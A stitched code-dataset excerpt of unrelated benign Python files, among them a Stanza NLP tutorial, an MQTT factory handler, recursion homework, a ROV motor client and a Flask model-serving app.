self.functions = functions.all()
self.demographics = demographics
self.summary = summary
self.display = display
def tearDown(self):
self.display.delete()
super(StatisticsSetTestCase, self).tearDown()
def test_copy_scoredisplay(self):
user = User(username="Stats User")
user.save()
# We'll set the owner but it's overwritten
copy = ScoreDisplay(owner=user)
copy = copy.copy_from(display=self.display)
self.assertEqual(
"%s copy" % self.display.__unicode__(), copy.__unicode__(),
"ScoreDisplay title copied, allowing same name for user more than once"
)
self.assertEqual(
len(copy.scorepanel_set.all()),
len(self.display.scorepanel_set.all()),
"Copied scoredisplay has wrong number of panels attached")
self.assertNotEqual(
user, copy.owner,
"ScoreDisplay copied owner rather than copying owner from ScoreDisplay"
)
copy = ScoreDisplay(owner=user)
copy = copy.copy_from(display=self.display, owner=user)
self.assertEqual(self.display.__unicode__(), copy.__unicode__(),
"Title of scoredisplay not copied")
self.assertEqual(
len(copy.scorepanel_set.all()),
len(self.display.scorepanel_set.all()),
"Copied scoredisplay has wrong number of panels attached")
vap = ScoreFunction.objects.get(name="Voting Age Population")
copy = copy.copy_from(
display=self.display,
functions=[unicode(str(vap.id))],
title="Copied from")
self.assertEqual(
len(copy.scorepanel_set.all()),
len(self.display.scorepanel_set.all()),
"Copied scoredisplay has wrong number of panels attached")
new_demo = ScoreDisplay.objects.get(title="Copied from")
panels_tested = 0
for panel in new_demo.scorepanel_set.all():
if panel.title == "Plan Summary":
self.assertEqual(
len(self.summary.score_functions.all()),
len(panel.score_functions.all()),
"Copied plan summary panel didn't have correct number of functions"
)
panels_tested += 1
elif panel.title == "Demographics":
self.assertEqual(1, len(
panel.score_functions.all()
), "Copied demographics panel didn't have correct number of functions"
)
panels_tested += 1
self.assertEqual(2, panels_tested,
"Copied scoredisplay didn't have both panels needed")
# Let's try just updating those score functions
new_copy = ScoreDisplay(owner=user)
new_copy = copy.copy_from(display=copy, functions=self.functions)
self.assertEqual(copy.title, new_copy.title,
"Title of scoredisplay not copied")
self.assertEqual(copy.id, new_copy.id,
"Scorefunctions not added to current display")
self.assertEqual(
len(copy.scorepanel_set.all()), len(new_copy.scorepanel_set.all()),
"Copied scoredisplay has wrong number of panels attached")
panels_tested = 0
for panel in new_copy.scorepanel_set.all():
if panel.title == "Plan Summary":
self.assertEqual(
len(self.summary.score_functions.all()),
len(panel.score_functions.all()),
"Copied plan summary panel didn't have correct number of functions"
)
panels_tested += 1
elif panel.title == "Demographics":
self.assertEqual(
len(self.functions), len(panel.score_functions.all()),
"Copied demographics panel didn't have correct number of functions; e:%d,a:%d"
% (3, len(panel.score_functions.all())))
panels_tested += 1
self.assertEqual(2, panels_tested,
"Copied scoredisplay didn't have both panels needed")
| 2.1875 | 2 |
stanza_bio.py | daniloBlera/biomed-parsers-intro | 0 | 12799130 | <filename>stanza_bio.py
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Some simple usage examples of the stanfordnlp Stanza library
The original Colab notebook where this script came from:
https://colab.research.google.com/drive/1AEdAzR4_-YNEClAB2TfSCYmWz7fIcHIO?usp=sharing
Colab notebook on scispaCy:
https://colab.research.google.com/drive/1O5qxkgvB3x80PuOo6EbVZnw55fnd_MZ3?usp=sharing
This script requires the 'stanza' and 'nltk' modules, I'd highly recommend you
install both libraries under an isolated python virtual environment and avoid
borking your system's python installation
Some extra info:
Python version: 3.8.6
OS: arch linux
"""
# Importing modules
import re
import stanza
import nltk
# The path where downloads should be saved. By default it points to your user's
# HOME directory on linux/macos, no idea where it does it on windows.
STANZA_DOWNLOAD_DIR = './stanza_resources'
# Downloading the biomedical models
# Our main pipeline, trained with the CRAFT corpus
stanza.download('en', dir=STANZA_DOWNLOAD_DIR, package='craft')
# The NER models
stanza.download(lang='en', dir=STANZA_DOWNLOAD_DIR, package='jnlpba')
stanza.download(lang='en', dir=STANZA_DOWNLOAD_DIR, package='linnaeus')
stanza.download(lang='en', dir=STANZA_DOWNLOAD_DIR, package='s800')
# Initializing the document annotator
nlp = stanza.Pipeline(lang='en', dir=STANZA_DOWNLOAD_DIR, package='craft')
# Defining the text
# The text below was extracted from the 2019 BioNLP OST `BB-Rel` task, document
# `BB-rel-14633026.txt` from the Development dataset.
#
# Task URL: https://sites.google.com/view/bb-2019/dataset#h.p_n7YHdPTzsDaj
text = """
Characterization of a mosquitocidal Bacillus thuringiensis serovar sotto strain
isolated from Okinawa, Japan. To characterize the mosquitocidal activity of
parasporal inclusions of the Bacillus thuringiensis serovar sotto strain
96-OK-85-24, for comparison with two well-characterized mosquitocidal strains.
The strain 96-OK-85-24 significantly differed from the existing mosquitocidal
B. thuringiensis strains in: (1) lacking the larvicidal activity against Culex
pipiens molestus and haemolytic activity, and (2) SDS-PAGE profiles,
immunological properties and N-terminal amino acid sequences of parasporal
inclusion proteins. It is clear from the results that the strain 96-OK-85-24
synthesizes a novel mosquitocidal Cry protein with a unique toxicity spectrum.
This is the first report of the occurrence of a mosquitocidal B. thuringiensis
strain with an unusual toxicity spectrum, lacking the activity against the
culicine mosquito.
"""
print(text)
# Removing newlines
# The line below will replace newlines with a single whitespace, then any
# trailing spaces will be trimmed. We'll leave sentence segmentation for the
# trained model to handle.
text = re.sub(r'\n+', ' ', text).strip()
print(text)
# Annotating the document
# Just call `nlp(STRING)` and that's pretty much it
doc = nlp(text)
# Tokenization, Lemmas and Part-of-Speech (PoS) and Sentence Segmentation
# An annotated document will have the following [structure][stanza-objs]:
# * A `document` contains `sentences`;
# * A `sentence` contains `tokens`/`words`;
# * A `token` contains one of more `words`;
# note: On stanza there is a distiction between a [Token][stanza-token] and a
# [Word][stanza-word] object.
# Unlike `spacy`, in order to access a word's properties (e.g.: lemma, PoS
# tags, etc.) you must iterate over the document's sentences and then iterate
# over each sentences to get their tokens/words (wich also means their token
# IDs are relative to the sentences they're from, you'll see down below). In
# general, a stanza code looks something like this:
# for sent in doc.sentences:
# # Operating on the document sentences
# # At this level you get the semantic dependencies
#
# for token in sent.tokens:
# # Operating on the sentence's tokens
#
# for word in sent.words:
# # Operating on the sentence's words
#
# https://stanfordnlp.github.io/stanza/data_objects.html
# https://stanfordnlp.github.io/stanza/data_objects.html#token
# https://stanfordnlp.github.io/stanza/data_objects.html#word
for (i, sent) in enumerate(doc.sentences):
print(f'SENTENCE {i+1}')
print(' ID TEXT LEMMA UPOS POS')
for word in sent.words:
print(f'{word.id:>4} {word.text:>20} {word.lemma:<20} {word.upos:>5}',
f'{word.xpos:<5}')
print()
# Semantic Dependency Parsing
# Semantic dependency information can be accessed at sentence level
print(' ID TEXT DEP HEAD TEXT HEAD ID')
for (i, sent) in enumerate(doc.sentences):
print(f'SENTENCE {i+1}')
print(' ID WORD TEXT <---DEP--- HEAD TEXT ID')
for dep in sent.dependencies:
# Using 'Source' and 'Target' here as a reference to the semantic
# dependency arrow direction
[src_word, deprel, tgt_word] = dep
print(f'{tgt_word.id:>4} {tgt_word.text:>20} <{deprel:-^9}',
f'{src_word.text:<20} {src_word.id:>4}')
print()
# Noun Chunks
# The stanza framework has no built-in chunking, instead we'll be using the
# `nltk` module and its example noun chunk grammar:
#
# <DT>?<JJ.*>*<NN.*>+
#
# * `<DT>?` - An optional determiner;
# * `<JJ.*>*` - Zero or more adjectives;
# * `<NN.*>+` - One or more nouns.
#
# where:
# * `?` means zero or one of the previous pattern;
# * `*` means zero or more of the previous pattern;
# * `+` means one or more of the previous pattern;
# * `.` means any (single) character.
#
# https://www.nltk.org/book/ch07.html
def print_chunks(doc: stanza.Document, grammar: str,
print_full_tree: bool = True):
"""
Print a document's chunks
Arguments:
doc: stanza.Document
An (PoS) annotated document
grammar: str
An nltk chunk grammar regular expression
print_full_tree: True|False
If true, print the whole tree, else print only the matching grammar
chunks
"""
cp = nltk.RegexpParser(grammar)
for (i, sent) in enumerate(doc.sentences):
print(f'SENTENCE {i+1}')
sentence = [(w.text, w.xpos) for w in sent.words]
chunk_tree = cp.parse(sentence)
if print_full_tree is True:
print(chunk_tree, end='\n\n')
else:
for subtree in chunk_tree.subtrees():
if subtree.label() == 'NP':
print(subtree)
print()
grammar = 'NP: {<DT>?<JJ.*>*<NN.*>+}'
print_chunks(doc, grammar, print_full_tree=False)
print_chunks(doc, grammar, print_full_tree=True)
# Named Entity Recognition (NER)
# From stanza's available NER models we'll test the JNLPBA, Linnaeus and S800
# models
#
# https://stanfordnlp.github.io/stanza/available_biomed_models.html#biomedical--clinical-ner-models
def show_ner(text: str, ner_model: str):
"""
Just a shortcut to annotate the text with the given NER model
"""
nlp = stanza.Pipeline(lang='en', package='craft',
dir=STANZA_DOWNLOAD_DIR,
processors={'ner': ner_model})
doc = nlp(text)
print(f'\nNER MODEL: {ner_model}')
print('TYPE TEXT')
for ent in doc.entities:
print(f'{ent.type:<10} {ent.text}')
show_ner(text, 'jnlpba')
show_ner(text, 'linnaeus')
show_ner(text, 's800')
| 2.5625 | 3 |
boj/4344.py | pparkddo/ps | 1 | 12799131 | <filename>boj/4344.py
import sys; input=sys.stdin.readline
for _ in range(int(input())):
n, *scores = map(int, input().split())
average = sum(scores) / len(scores)
answer = len(list(filter(lambda x: x > average, scores))) / len(scores)
print(f"{answer:.3%}")
| 3.453125 | 3 |
dhbwFischertechnik/factoryWebsite/mqttHandler.py | Ic3Fighter/Modellfabrik | 4 | 12799132 | <filename>dhbwFischertechnik/factoryWebsite/mqttHandler.py
import json
from asgiref.sync import async_to_sync
from channels.layers import get_channel_layer
from factoryWebsite.models import Order
from factoryWebsite.utils import sendNewOrderToFactory
monitorMainUnit = False
temperatureMainUnit = ""
voltageMainUnit = ""
monitorSortingLine = False
colorSortingLine = ""
temperatureSortingLine = ""
voltageSortingLine = ""
def Status_Data_Handler(topic, data):
json_Dict = json.loads(data)
message = json_Dict['Text']
short_topic = topic.partition("Status/")[2]
customer_group_name = 'name_%s' % short_topic
channel_layer = get_channel_layer()
async_to_sync(channel_layer.group_send)(
customer_group_name,
{
'type': 'status_message',
'message': message
}
)
def Monitoring_Data_Handler(topic, data):
global colorSortingLine, temperatureSortingLine, voltageSortingLine, temperatureMainUnit, voltageMainUnit, \
monitorSortingLine, monitorMainUnit
json_Dict = json.loads(data)
if topic == "Monitor/MainUnit":
temperatureMainUnit = json_Dict['Temperature']
voltageMainUnit = json_Dict['Voltage']
monitorMainUnit = True
elif topic == "Monitor/SortingLine":
colorSortingLine = json_Dict['Color']
temperatureSortingLine = json_Dict['Temperature']
voltageSortingLine = json_Dict['Voltage']
monitorSortingLine = True
if monitorMainUnit and monitorSortingLine:
monitorMainUnit = False
monitorSortingLine = False
channel_layer = get_channel_layer()
async_to_sync(channel_layer.group_send)(
'sensors_monitoring',
{
'type': 'monitoring_message',
'colorSortingLine': colorSortingLine,
'temperatureSortingLine': temperatureSortingLine,
'voltageSortingLine': voltageSortingLine,
'temperatureMainUnit': temperatureMainUnit,
'voltageMainUnit': voltageMainUnit
}
)
def Storage_Data_Handler(data):
json_Dict = json.loads(data)
channel_layer = get_channel_layer()
async_to_sync(channel_layer.group_send)(
'storage_monitoring',
{
'type': 'storage_message',
'storage0': json_Dict['Storage0'],
'storage1': json_Dict['Storage1'],
'storage2': json_Dict['Storage2'],
'storage3': json_Dict['Storage3'],
'storage4': json_Dict['Storage4'],
'storage5': json_Dict['Storage5'],
'storage6': json_Dict['Storage6'],
'storage7': json_Dict['Storage7'],
'storage8': json_Dict['Storage8']
}
)
def Order_Ready_Data_Handler(data):
json_Dict = json.loads(data)
last_id = json_Dict['LastId']
try:
recentOrder = Order.objects.get(transaction_id=last_id)
recentOrder.finished = True
recentOrder.save()
# recentOrder.delete()
except Order.DoesNotExist:
pass
sendNewOrderToFactory(True)
def topic_Data_Handler_QoS_0(topic, data):
if topic.startswith("Monitor"):
Monitoring_Data_Handler(topic, data)
elif topic == "Storage/Factory":
Storage_Data_Handler(data)
def topic_Data_Handler_QoS_2(topic, data):
if topic.startswith("Status"):
Status_Data_Handler(topic, data)
elif topic == "Order/Ready":
Order_Ready_Data_Handler(data)
| 2.359375 | 2 |
homework5.py | chubbypanda/principles-of-computing | 22 | 12799133 | # Homework 5 for Principles of Computing class, by k., 07/19/2014
# Question 1
class Incrementer(object):
'''
counting increments separately from the function
'''
def __init__(self, count):
self.count = count
def increment(self):
self.count += 1
"""
Recursion according to the "Cat in the Hat"
"""
def get_next_cat(current_cat):
"""
Helper function to get next cat
"""
if current_cat == "Cat in the Hat":
return "Little Cat A"
elif current_cat != "Little Cat Z":
return "Little Cat " + chr(ord(current_cat[-1]) + 1)
else:
return "Voom"
def clean_up(helper_cat):
"""
Recursive function that prints out story
"""
if helper_cat == "Voom":
print helper_cat + ": I got this. Mess is all cleaned up!"
else:
next_cat = get_next_cat(helper_cat)
print helper_cat + ": I'll have", next_cat, "clean up!"
clean_up(next_cat)
i.increment()
# get those cats to work!!!!!
print 'Question 1 prep...'
i = Incrementer(0)
clean_up("Cat in the Hat")
i.increment()
print 'Question 1 answer:', i.count
# Question 2
def add_up(n):
if n == 0:
return 0
else:
return n + add_up(n - 1)
print '\nPrep for Question 2 follows...'
print 'when n is 0:', add_up(0)
print 'when n is 1:', add_up(1)
print 'when n is 2:', add_up(2)
print 'when n is 3:', add_up(3)
print 'when n is 4:', add_up(4)
print 'when n is 5:', add_up(5)
print 'when n is 6:', add_up(6)
print 'when n is 7:', add_up(7)
print 'when n is 8:', add_up(8)
# Question 3
def multiply_up(n):
if n == 0:
return 1
else:
return n * multiply_up(n - 1)
print '\nPrep for Question 3 follows...'
print 'when n is 0:', multiply_up(0)
print 'when n is 1:', multiply_up(1)
print 'when n is 2:', multiply_up(2)
print 'when n is 3:', multiply_up(3)
print 'when n is 4:', multiply_up(4)
print 'when n is 5:', multiply_up(5)
print 'when n is 6:', multiply_up(6)
print 'when n is 7:', multiply_up(7)
print 'when n is 8:', multiply_up(8)
# Question 4
def fib(num):
if num == 0:
return 0
elif num == 1:
return 1
else:
j.increment()
return fib(num - 1) + fib(num - 2)
print '\nPrep for Question 4 follows...'
j = Incrementer(0)
fib(2)
print 'when n is 2:', j.count
j = Incrementer(0)
fib(3)
print 'when n is 3:', j.count
j = Incrementer(0)
fib(4)
print 'when n is 4:', j.count
j = Incrementer(0)
fib(5)
print 'when n is 5:', j.count
j = Incrementer(0)
fib(6)
print 'when n is 6:', j.count
j = Incrementer(0)
fib(7)
print 'when n is 7:', j.count
j = Incrementer(0)
fib(8)
print 'when n is 8:', j.count
# Question 5
def memoized_fib(num, memo_dict):
k.increment()
if num in memo_dict:
return memo_dict[num]
else:
sum1 = memoized_fib(num - 1, memo_dict)
#k.increment()
sum2 = memoized_fib(num - 2, memo_dict)
#k.increment()
memo_dict[num] = sum1 + sum2
return sum1 + sum2
print '\nPrep for Question 5 follows...'
k = Incrementer(0)
memoized_fib(0, {0 : 0, 1 : 1})
print 'when n is 0:', k.count
k = Incrementer(0)
memoized_fib(1, {0 : 0, 1 : 1})
print 'when n is 1:', k.count
k = Incrementer(0)
memoized_fib(2, {0 : 0, 1 : 1})
print 'when n is 2:', k.count
k = Incrementer(0)
memoized_fib(3, {0 : 0, 1 : 1})
print 'when n is 3:', k.count
k = Incrementer(0)
memoized_fib(4, {0 : 0, 1 : 1})
print 'when n is 4:', k.count
k = Incrementer(0)
memoized_fib(5, {0 : 0, 1 : 1})
print 'when n is 5:', k.count
k = Incrementer(0)
memoized_fib(6, {0 : 0, 1 : 1})
print 'when n is 6:', k.count
k = Incrementer(0)
memoized_fib(7, {0 : 0, 1 : 1})
print 'when n is 7:', k.count
# Question 6
def outcomes(word):
'''
generate (function shall be recursive!) all strings that can be composed
from the letters in word in any order;
returns a list of all strings that can be formed from the letters in word
'''
# base case; no string
if not word:
return ['']
possibilities = []
# generate all appropriate strings for rest of the word
for string in outcomes(word[1:]):
l.increment()
for index in range(len(string) + 1):
# inserting the initial character in all possible positions within the string
possibilities.append(string[:index] + word[0] + string[index:])
l.increment()
return outcomes(word[1:]) + possibilities
print '\nPrep for Question 6 follows...'
l = Incrementer(0)
outcomes('a')
print 'when n is 1:', l.count
l = Incrementer(0)
outcomes('ab')
print 'when n is 2:', l.count
l = Incrementer(0)
outcomes('abc')
print 'when n is 3:', l.count
l = Incrementer(0)
outcomes('abcd')
print 'when n is 4:', l.count
l = Incrementer(0)
outcomes('abcde')
print 'when n is 5:', l.count
l = Incrementer(0)
outcomes('abcdef')
print 'when n is 6:', l.count
l = Incrementer(0)
outcomes('abcdefg')
print 'when n is 7:', l.count
| 4.09375 | 4 |
lab5/kernel/sendimg.py | Mechshaman/osc2022 | 0 | 12799134 | import argparse
import serial
import os
parser = argparse.ArgumentParser()
parser.add_argument('image', default='kernel8.img', type=str)
parser.add_argument('device',default='/dev/ttyUSB0', type=str)
args = parser.parse_args()
try:
ser = serial.Serial(args.device,115200)
except:
print("Serial init failed!")
exit(1)
file_path = args.image
file_size = os.stat(file_path).st_size
ser.write(file_size.to_bytes(4, byteorder="big"))
print("Sending kernel...")
with open(file_path, 'rb', buffering = 0) as f:
for i in range(file_size):
ser.write(f.read(1))
print(ser.readline())
print("done") | 2.765625 | 3 |
code/mini-rov/hydrogenMiniROVClient2020.py | CISSROV/2019-Project | 2 | 12799135 | #!/usr/bin/env python3.4
import webSocketClient
import motorInterface
import json
axis = ['xLeft', 'yLeft', 'triggerLeft', 'xRight', 'yRight', 'triggerRight']
buttons = ['A', 'B', 'X', 'Y', 'LB', 'RB']
trimUp = {
'center': 0.0
}
# these are in a row
# this motor is IN3/4 on the edge of the motor controller
m1 = motorInterface.motor(16, 26) # vertical
m2 = motorInterface.motor(12, 13) # unused
# 2nd chip
m3 = motorInterface.motor(27, 23) # side (maybe left)
m4 = motorInterface.motor(4, 18) # side (maybe right)
def move1(pow):
m1.set(pow)
def move2(pow):
m2.set(pow)
def move3(pow):
m3.set(pow)
def move4(pow):
m4.set(pow)
justPressed = [
{
'A': False,
'B': False,
'X': False,
'Y': False,
'LB': False,
'RB': False
},
{
'A': False,
'B': False,
'X': False,
'Y': False,
'LB': False,
'RB': False
}
]
def buttonPressed(button, num):
global trimUp
# num is 0 or 1
if num == 1: # controller number 2
if button == 'LB':
trimUp['center'] += 1
elif button == 'RB':
trimUp['center'] -= 1
def process(data):
joysticks = json.loads(data)
assert len(joysticks) == 24
joystick1 = dict(zip(axis + buttons, joysticks[:12]))
joystick2 = dict(zip(axis + buttons, joysticks[12:]))
old = [] # for debugging
#print('msg:', joysticks)
del data
global justPressed
stickNum = 0
for stick, jPressed in zip((joystick1, joystick2), justPressed):
for k in stick:
if k not in buttons:
continue
v = stick[k]
if v == 1 and not jPressed[k]:
# just pressed
buttonPressed(k, stickNum)
jPressed[k] = True
elif v == 0 and jPressed[k]:
# just released
jPressed[k] = False
elif v not in [1, 0]:
raise ValueError('Got {0}, expected 0 or 1'.format(v))
else:
pass
stickNum += 1
del stickNum
yLeft = 50 * joystick2['yLeft']
#xLeft = 50 * joystick2['xLeft']
yRight = 50 * joystick2['yRight']
#xRight = 50 * joystick2['xRight']
joystick2['triggerRight'] = (joystick2['triggerRight'] + 1) / 2
joystick2['triggerLeft'] = (joystick2['triggerLeft'] + 1) / 2
vertical = 0
if joystick2['triggerRight'] >= 0.1 and joystick2['triggerLeft'] >= 0.1:
pass # do nothing cause both are pressed
else:
if joystick2['triggerRight'] > 0.1:
# spin right
vertical = joystick2['triggerRight'] * 50
if joystick2['triggerLeft'] > 0.1:
# spin left
vertical = -joystick2['triggerLeft'] * 50
# Mini-ROV motor setup
# top view
# ____
# | |
# /a\| |/b\
# |____|
# (up)
#
motor_a = yLeft
motor_b = yRight
global trimUp
motor_up = trimUp['center'] + vertical
def bounds(x):
# max power is -100 to 100
if x < -50:
return -50
if x > 50:
return 50
return round(x, 2)
motor_a = bounds(motor_a)
motor_b = bounds(motor_b)
motor_up = bounds(motor_up)
# right
move1(motor_up)
move4(motor_a)
move3(motor_b)
# print datalist
for i in range(30):
print('\r\033[A\033[K', end='')
print('Trim: {0}'.format(trimUp['center']))
print(joystick1)
print(joystick2)
print(motor_a, motor_b)
print(motor_up)
print()
index = 0
for i in old:
print(index, i)
index += 1
webSocketClient.start('miniROV', process, ip="192.168.1.2")
| 2.25 | 2 |
app.py | tristan-jl/tensorflow-flask | 0 | 12799136 | <filename>app.py
import pandas as pd
import tensorflow_decision_forests as tfdf
from flask import Flask
from flask import jsonify
from flask import request
from tensorflow import keras
app = Flask(__name__)
model = keras.models.load_model("gb_model")
@app.route("/predict", methods=["POST"])
def predict():
data = request.json
df = tfdf.keras.pd_dataframe_to_tf_dataset(pd.DataFrame(data, index=[0]))
prediction = model.predict(df)
return jsonify({"survival": str(prediction.flatten()[0])})
@app.route("/predict_batch", methods=["POST"])
def predict_batch():
data = request.json
df = tfdf.keras.pd_dataframe_to_tf_dataset(pd.DataFrame(data))
predictions = model.predict(df)
return jsonify({"survival_batch": [str(i) for i in predictions.flatten()]})
if __name__ == "__main__":
app.run(port=8080)
| 2.75 | 3 |
scrapli_community/nokia/srlinux/async_driver.py | ikievite/scrapli_community | 37 | 12799137 | <filename>scrapli_community/nokia/srlinux/async_driver.py
"""scrapli_community.nokia.nokia_srlinux.async_driver"""
from scrapli.driver import AsyncNetworkDriver
async def default_async_on_open(conn: AsyncNetworkDriver) -> None:
"""
nokia_srlinux on_open callable
Args:
conn: AsyncNetworkDriver object
Returns:
None
Raises:
N/A
"""
await conn.acquire_priv(desired_priv=conn.default_desired_privilege_level)
await conn.send_command(command="environment cli-engine type basic")
await conn.send_command(command="environment complete-on-space false")
async def default_async_on_close(conn: AsyncNetworkDriver) -> None:
"""
nokia_srlinux default on_close callable
Args:
conn: AsyncNetworkDriver object
Returns:
None
Raises:
N/A
"""
await conn.acquire_priv(desired_priv=conn.default_desired_privilege_level)
conn.channel.write(channel_input="logout")
conn.channel.send_return()
| 2.109375 | 2 |
input/pad.py | villinvic/Georges | 6 | 12799138 | <gh_stars>1-10
from config.loader import Default
from input.enums import Stick, Button, Trigger
from input.action_space import ControllerState
import zmq
import os
import platform
class Pad(Default):
"""Writes out controller inputs."""
action_dim = 50
def __init__(self, path, player_id, port=None):
super(Pad, self).__init__()
"""Create, but do not open the fifo."""
self.pipe = None
self.path = path + 'georges_' + str(player_id)
self.windows = port is not None
self.port = port
self.player_id = player_id
self.message = ""
self.action_space = []
self.previous_state = ControllerState()
def connect(self):
if self.windows:
context = zmq.Context()
with open(self.path, 'w') as f:
f.write(str(self.port))
self.pipe = context.socket(zmq.PUSH)
address = "tcp://127.0.0.1:%d" % self.port
print("Binding pad %s to address %s" % (self.path, address))
self.pipe.bind(address)
else:
try:
os.unlink(self.path)
except:
pass
os.mkfifo(self.path)
self.pipe = open(self.path, 'w', buffering=1)
def unbind(self):
if not self.windows:
self.pipe.close()
try:
os.unlink(self.path)
except Exception:
pass
self.message = ""
def flush(self):
if self.windows:
self.pipe.send_string(self.message)
else:
self.pipe.write(self.message)
self.message = ""
def write(self, command, buffering=False):
self.message += command + '\n'
if not buffering:
self.flush()
def press_button(self, button, buffering=False):
"""Press a button."""
#assert button in Button or button in UsefullButton
self.write('PRESS {}'.format(button), buffering)
def release_button(self, button, buffering=False):
"""Release a button."""
#assert button in Button or button in UsefullButton
self.write('RELEASE {}'.format(button), buffering)
def press_trigger(self, trigger, amount, buffering=False):
"""Press a trigger. Amount is in [0, 1], with 0 as released."""
#assert trigger in Trigger or trigger in UsefullButton
#assert 0 <= amount <= 1
self.write('SET {} {:.2f}'.format(trigger, amount), buffering)
def tilt_stick(self, stick, x, y, buffering=False):
"""Tilt a stick. x and y are in [0, 1], with 0.5 as neutral."""
#assert stick in Stick
#assert 0 <= x <= 1 and 0 <= y <= 1
self.write('SET {} {:.2f} {:.2f}'.format(stick, x, y), buffering)
def reset(self):
for button in Button:
self.release_button(button)
for trigger in Trigger:
self.press_trigger(trigger, 0)
for stick in Stick:
self.tilt_stick(stick, 0.5, 0.5)
| 2.46875 | 2 |
Special Midterm Exam in OOP.py | Jerohlee/OOP-1-2 | 0 | 12799139 | <gh_stars>0
from tkinter import *
window = Tk()
window.title("Special Midterm Exam in OOP")
window.geometry("300x200+20+10")
def changecolor():
button.configure(bg="yellow")
button = Button(window, text = "Click to Change Color", command= changecolor)
button.place(relx=.5, y=100, anchor="center")
window.mainloop() | 3.390625 | 3 |
apminsight/instrumentation/dbapi2.py | Wealize/apminsight-site24x7-py | 0 | 12799140 | from apminsight import constants
from apminsight.util import is_non_empty_string
from apminsight.agentfactory import get_agent
from .wrapper import default_wrapper
class CursorProxy():
def __init__(self, cursor, conn):
self._apm_wrap_cursor = cursor
self._apm_wrap_conn = conn
self._apm_check_and_wrap('execute')
self._apm_check_and_wrap('executemany')
def __getattr__(self, key):
if key in self.__dict__:
return getattr(self, key)
return getattr(self._apm_wrap_cursor, key)
def __setattr__(self, key, value):
if( key in ['_apm_wrap_cursor', '_apm_wrap_conn', 'execute', 'executemany']):
self.__dict__[key] = value
else:
return setattr(self._apm_wrap_conn, key, value)
def _apm_check_and_wrap(self, attr):
if hasattr(self._apm_wrap_cursor, attr):
actual = getattr(self._apm_wrap_cursor, attr)
attr_info = {
constants.method_str : attr,
constants.component_str : self._apm_wrap_conn._apm_comp_name,
constants.extract_info : self._apm_extract_query,
constants.is_db_tracker : True
}
wrapper = default_wrapper(actual, 'Cursor', attr_info)
setattr(self, attr, wrapper)
def _apm_extract_query(self, tracker, args=(), kwargs={}, return_value=None):
tracker.set_info(self._apm_wrap_conn._apm_host_info)
threshold = get_agent().get_threshold()
if threshold.is_sql_capture_enabled() is not True:
return
if isinstance(args, (list, tuple)) and len(args)>0:
if is_non_empty_string(args[0]):
tracker.set_info({'query' : args[0]})
class ConnectionProxy():
def __init__(self, conn, comp, host_info):
self._apm_wrap_conn = conn
self._apm_comp_name = comp
self._apm_host_info = host_info
def cursor(self, *args, **kwargs):
real_cursor = self._apm_wrap_conn.cursor(*args, **kwargs)
cur = CursorProxy(real_cursor, self)
return cur
def __getattr__(self, key):
if key in self.__dict__:
return getattr(self, key)
return getattr(self._apm_wrap_conn, key)
def __setattr__(self, key, value):
if( key in ['_apm_wrap_conn', '_apm_comp_name', '_apm_host_info']):
self.__dict__[key] = value
else:
return setattr(self._apm_wrap_conn, key, value)
@staticmethod
def get_host_info(method_info, conn_kwargs):
host_info = {}
if constants.host in conn_kwargs:
host_info[constants.host] = conn_kwargs[constants.host]
elif constants.default_host in method_info:
host_info[constants.host] = conn_kwargs[constants.host]
if constants.port in conn_kwargs:
host_info[constants.port] = str(conn_kwargs[constants.port])
elif constants.default_port in method_info:
host_info[constants.port] = method_info[constants.default_port]
return host_info
@staticmethod
def instrument_conn(original, module, method_info):
def conn_wrapper(*args, **kwargs):
conn = original(*args, **kwargs)
if conn is not None:
comp = method_info.get(constants.component_str, '')
host_info = ConnectionProxy.get_host_info(method_info, kwargs)
new_conn = ConnectionProxy(conn, comp, host_info)
return new_conn
return conn
return conn_wrapper
| 2.125 | 2 |
casclik/controllers/__init__.py | mahaarbo/casclik | 14 | 12799141 | from casclik.controllers.reactive_qp import ReactiveQPController
from casclik.controllers.reactive_nlp import ReactiveNLPController
from casclik.controllers.pseudo_inverse import PseudoInverseController
from casclik.controllers.model_predictive import ModelPredictiveController
| 1.078125 | 1 |
datalad_metalad/processor/autoget.py | yarikoptic/datalad-metalad | 7 | 12799142 | <filename>datalad_metalad/processor/autoget.py<gh_stars>1-10
import logging
from .base import Processor
from ..pipelineelement import (
PipelineResult,
ResultState,
PipelineElement,
)
from ..utils import check_dataset
logger = logging.getLogger("datalad.metadata.processor.autoget")
class AutoGet(Processor):
"""
This processor "gets" a file that is annexed and not locally available.
It sets a flag in the element that will allow the AutoDrop-processor
to automatically drop the file again.
"""
def __init__(self):
super().__init__()
def process(self, pipeline_element: PipelineElement) -> PipelineElement:
for traverse_result in pipeline_element.get_result("dataset-traversal-record"):
if traverse_result.type == "File":
path = traverse_result.path
if path.is_symlink():
if path.exists() is False:
fs_dataset_path = (
traverse_result.fs_base_path
/ traverse_result.dataset_path
)
dataset = check_dataset(str(fs_dataset_path), "auto_get")
logger.debug(
f"AutoGet: automatically getting {path} "
f"in dataset {dataset.path}")
dataset.get(str(traverse_result.path), jobs=1)
pipeline_element.set_result(
"auto_get",
[PipelineResult(ResultState.SUCCESS)])
return pipeline_element
| 2.34375 | 2 |
string_09.py | Technicoryx/python_strings_inbuilt_functions | 0 | 12799143 | """Below Python Programme demonstrate encode
functions in a string"""
#Utf-8 Encoding
# unicode string
string = 'pythön!'
# print string
print('The string is:', string)
# default encoding to utf-8
string_utf = string.encode()
# print result
print('The encoded version is:', string_utf)
# unicode string
string = 'pythön!'
# print string
print('The string is:', string)
# ignore error
print('The encoded version (with ignore) is:', string.encode("ascii", "ignore"))
# replace error
print('The encoded version (with replace) is:', string.encode("ascii", "replace"))
| 4.15625 | 4 |
answer/0066/66.linningmii.py | linningmii/leetcode | 15 | 12799144 | <gh_stars>10-100
class Solution:
def plusOne(self, digits):
"""
:type digits: List[int]
:rtype: List[int]
"""
result = digits[:]
for i in range(len(result) - 1, -1, -1):
if result[i] == 9:
result[i] = 0
if i == 0:
result.insert(0, 1)
else:
result[i] += 1
return result
return result
| 3.0625 | 3 |
rl-fmri/tmp_load_zip.py | liusida/thesis-bodies | 0 | 12799145 | <reponame>liusida/thesis-bodies
from stable_baselines3 import PPO
filename = "exp5/model-ant-400-500-600-s0.zip"
model = PPO.load(filename)
print(model) | 1.390625 | 1 |
tests/test_weatherman_butler.py | aecobb53/weatherman | 1 | 12799146 | from weatherman import weather_butler
import pytest
import datetime # noqa
import sqlite3 # noqa
import yaml
import json # noqa
import os
import unittest
mock = unittest.mock.Mock()
master_copnfig = 'etc/weatherman.yml'
with open(master_copnfig) as ycf:
